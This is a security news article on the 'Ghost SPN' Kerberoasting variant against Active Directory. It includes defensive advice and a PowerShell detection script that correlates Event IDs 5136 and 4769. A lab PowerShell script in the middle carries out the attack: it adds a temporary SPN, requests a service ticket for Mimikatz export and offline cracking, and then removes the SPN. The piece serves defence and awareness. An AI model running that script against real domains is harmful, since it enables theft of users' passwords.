Ghost SPN Attack Exploits Kerberos, Exposing User Passwords
Key Takeaways
- A new Kerberoasting variant, “Ghost SPN,” allows attackers to steal Active Directory credentials without leaving forensic traces.
- The attack abuses delegated administrative permissions to temporarily assign Service Principal Names (SPNs) to ordinary user accounts.
- Traditional detection methods are often blind to Ghost SPN due to its ephemeral nature and lack of suspicious activity.
- Mitigation requires aggressive auditing of Active Directory ACLs, granular logging, and enforcing stronger Kerberos encryption.
Ghost SPN Attack Evades Detection to Steal Active Directory Credentials
A sophisticated new attack technique, dubbed “Ghost SPN,” has emerged as a significant threat to Active Directory (AD) environments. This advanced form of Kerberoasting enables attackers to compromise user credentials and then meticulously erase their tracks, effectively blinding conventional security systems to the intrusion.
Security researchers at Trellix were instrumental in uncovering this method, which leverages delegated administrative permissions to create fleeting windows of vulnerability within an organization’s directory services.
Understanding Kerberoasting and the Ghost SPN Evolution
Kerberoasting is a well-established post-exploitation tactic against Active Directory accounts that carry Service Principal Names (SPNs). Any authenticated domain user can request a Ticket Granting Service (TGS) ticket for any registered SPN; the Key Distribution Center (KDC) encrypts the service portion of that ticket with the long-term key of the account that owns the SPN, which for RC4-HMAC is simply the account's NT hash. The attacker extracts the encrypted ticket and brute-forces the password offline, so nothing touches the target account's logon counters or lockout threshold.
The Ghost SPN variant dramatically escalates this threat. Rather than hunting for pre-existing service accounts, the adversary uses a delegated write permission over a user object, such as GenericAll, GenericWrite, or the validated write to servicePrincipalName, to add an arbitrary SPN to an ordinary user account. That single attribute write turns a standard user into a transient Kerberoasting target, and detections that start from an inventory of known service accounts never see it because no known service account is touched.
The Three-Phase Attack Lifecycle
According to Trellix researchers, the Ghost SPN attack unfolds in three distinct stages:
- SPN Assignment (Out-of-Band): The attacker uses write access to add an arbitrary SPN, such as http/webapp, to the chosen target account, typically with the ActiveDirectory PowerShell cmdlets. From then on the KDC treats the account as a legitimate service principal and issues a TGS ticket for it. If the requester asks for RC4 and the account's msDS-SupportedEncryptionTypes still permits it, the ticket is encrypted with RC4-HMAC-MD5 under the account's NT hash. The request itself is well-formed Kerberos; the only signals are the attribute write (Event ID 5136, if Directory Service Changes auditing is enabled) and the encryption type recorded in the 4769 event.
- Extraction and Offline Cracking: The issued TGS ticket is dumped from the client's ticket cache with a tool such as Mimikatz and exported as a .kirbi file. Cracking happens entirely outside the compromised network with tools such as Hashcat or tgsrepcrack.py, so no authentication failures or suspicious logon attempts are generated within the target infrastructure.
- Cleanup and Anti-Forensics: Immediately after ticket extraction the attacker removes the SPN, reverting the account to its original state. Nothing persistent remains in the directory, so defenders who rely on static directory snapshots or low-fidelity audit logs have no way to connect the earlier TGS request to malicious activity.
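The three phases above as they would be typed in a lab, as an added example that is not the article's or Trellix's code. It assumes the ActiveDirectory RSAT module is installed, that the running account holds GenericAll (or the validated SPN write) over the user `jdoe`, and that `http/webapp` is not already registered in the forest; the comments note what each step leaves behind for a defender.

```powershell
# Added example (not from the article or the Trellix research). Lab use only:
# $Target and $Spn are assumed values, and the account running this must already
# hold GenericAll or a validated servicePrincipalName write on the target object.
Import-Module ActiveDirectory

$Target = 'jdoe'          # assumed: an ordinary user the attacker can write to
$Spn    = 'http/webapp'   # arbitrary SPN; it only has to be unique in the forest

# Phase 1: SPN assignment. This is one LDAP modify of servicePrincipalName.
# It is recorded as Event 5136 (OperationType %%14674, value added) only when
# "Audit Directory Service Changes" is on AND the object carries a SACL.
Set-ADUser -Identity $Target -ServicePrincipalNames @{ Add = $Spn }

# Phase 2: request a service ticket for the SPN. The KDC logs Event 4769 with
# ServiceName = 'jdoe' and the negotiated TicketEncryptionType (0x17 = RC4).
# The ticket is encrypted with jdoe's long-term key; under RC4 that key is the
# NT hash, which hashcat mode 13100 attacks offline.
Add-Type -AssemblyName System.IdentityModel
$ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken `
              -ArgumentList $Spn
# $ticket.GetRequest() returns the raw AP-REQ bytes that contain the ticket;
# it is also now in the LSA cache (klist) and can be exported with Mimikatz:
#   kerberos::list /export
# which writes a .kirbi file for offline cracking, as the article describes.

# Phase 3: cleanup. The object is back to its original state; the only traces
# are the 5136 pair (added, then deleted with OperationType %%14675) and a 4769
# for an SPN that no longer resolves to anything.
Set-ADUser -Identity $Target -ServicePrincipalNames @{ Remove = $Spn }
```

The point for defenders is in the comments: every phase does leave a log line on the domain controller, but the lines land in two different event IDs and the attribute that links them is gone within seconds, so the evidence only survives if 5136 auditing was already configured before the attack.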
This technique directly undermines established detection models that operate under two critical flawed assumptions: first, that Kerberoasting targets are always pre-registered service accounts, and second, that malicious activity will invariably generate a high volume of anomalous ticket requests. The target account may never have been a service account, and the SPN might exist for mere seconds. When viewed in isolation, this activity is virtually indistinguishable from a legitimate administrative action, creating a significant visibility gap for Security Operations Centers (SOCs) that depend on fragmented log analysis.
What You Should Do
Organizations must adopt proactive measures to defend against Ghost SPN and similar attacks:
- Aggressively Audit ACLs: Regularly enumerate and revoke GenericAll, GenericWrite, and validated-write-to-servicePrincipalName permissions that non-administrative principals hold on user objects in Active Directory.
- Enable Granular AD Change Logging: Turn on Directory Service Changes auditing and apply a SACL to user objects so that servicePrincipalName modifications are recorded as Event ID 5136, then correlate those writes with subsequent service ticket requests (Event ID 4769) for the same account.
- Enforce AES-Only Kerberos Encryption: Set msDS-SupportedEncryptionTypes so that RC4-HMAC-MD5 is no longer offered. RC4 keys are the raw NT hash and crack far faster than AES keys, which are derived through PBKDF2; AES tickets can still be attacked offline, so long passwords remain necessary.
- Reset Compromised Account Passwords: Prioritize password resets for any account whose object has been writable by non-administrative principals, because a ticket captured during an earlier exposure window can still be cracked long after the SPN was removed.
- Deploy Behavioral NDR Tooling: Augment security stacks with behavioral Network Detection and Response (NDR) solutions, as static signature matching and SIEM-only approaches are insufficient for detecting ephemeral identity manipulation without comprehensive, cross-domain telemetry.
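The correlation recommended above, as an added example that is not the article's own code: it runs on a domain controller with the ActiveDirectory module, and assumes that Directory Service Changes auditing, Kerberos Service Ticket Operations auditing and a SACL for servicePrincipalName writes on user objects are already in place. The 30-minute window and 24-hour lookback are assumed values; 4769 does not record the SPN string, only the account it resolved to, so the join is on the account, not the SPN.

```powershell
# Added example (not from the article): pair servicePrincipalName writes (5136)
# with service-ticket requests (4769) for the same account inside a short window.
# Assumes RSAT ActiveDirectory, the audit settings named in the lead-in, and that
# it runs on (or against the Security log of) a domain controller.
Import-Module ActiveDirectory
$Window = New-TimeSpan -Minutes 30     # assumed: how close the TGS must follow the write
$Since  = (Get-Date).AddHours(-24)     # assumed lookback

function Get-EventField {
    param([System.Diagnostics.Eventing.Reader.EventRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object Name -eq $Name).'#text'
}

# 5136: OperationType %%14674 = value added, %%14675 = value deleted.
$spnWrites = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136; StartTime = $Since } -ErrorAction SilentlyContinue |
    Where-Object { (Get-EventField $_ 'AttributeLDAPDisplayName') -eq 'servicePrincipalName' } |
    ForEach-Object {
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Actor     = Get-EventField $_ 'SubjectUserName'
            ObjectDN  = Get-EventField $_ 'ObjectDN'
            Spn       = Get-EventField $_ 'AttributeValue'
            Operation = if ((Get-EventField $_ 'OperationType') -eq '%%14674') { 'Added' } else { 'Deleted' }
        }
    }

# 4769: ServiceName is the sAMAccountName the SPN resolved to (computers end in '$').
$tgsRequests = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769; StartTime = $Since } -ErrorAction SilentlyContinue |
    ForEach-Object {
        [pscustomobject]@{
            Time      = $_.TimeCreated
            Requester = Get-EventField $_ 'TargetUserName'
            Service   = (Get-EventField $_ 'ServiceName') -replace '\$$', ''
            EType     = Get-EventField $_ 'TicketEncryptionType'   # 0x17 = RC4-HMAC
            ClientIp  = Get-EventField $_ 'IpAddress'
        }
    }

foreach ($add in ($spnWrites | Where-Object Operation -eq 'Added')) {
    $sam = (Get-ADObject -Identity $add.ObjectDN -Properties sAMAccountName).sAMAccountName
    $hits = $tgsRequests | Where-Object {
        $_.Service -eq $sam -and $_.Time -ge $add.Time -and $_.Time -le ($add.Time + $Window)
    }
    # A matching delete of the same SPN after the request is the Ghost SPN signature.
    $removed = $spnWrites | Where-Object {
        $_.Operation -eq 'Deleted' -and $_.Spn -eq $add.Spn -and $_.Time -gt $add.Time
    } | Sort-Object Time | Select-Object -First 1

    foreach ($h in $hits) {
        [pscustomobject]@{
            SpnAdded   = $add.Time
            Actor      = $add.Actor
            Target     = $sam
            Spn        = $add.Spn
            TgsTime    = $h.Time
            Requester  = $h.Requester
            ClientIp   = $h.ClientIp
            RC4        = ($h.EType -eq '0x17')
            SpnRemoved = if ($removed) { $removed.Time } else { $null }
        }
    }
}
```

A row with a non-null SpnRemoved, RC4 set, and an Actor who is not a service-management administrator is the pattern the article describes; a row where the requester is the same principal as the actor is worth an immediate password reset of the target. Because 5136 is only written when the object has a SACL, the script sees nothing at all in a domain where that auditing was never configured, which is exactly the visibility gap the researchers point to.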
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.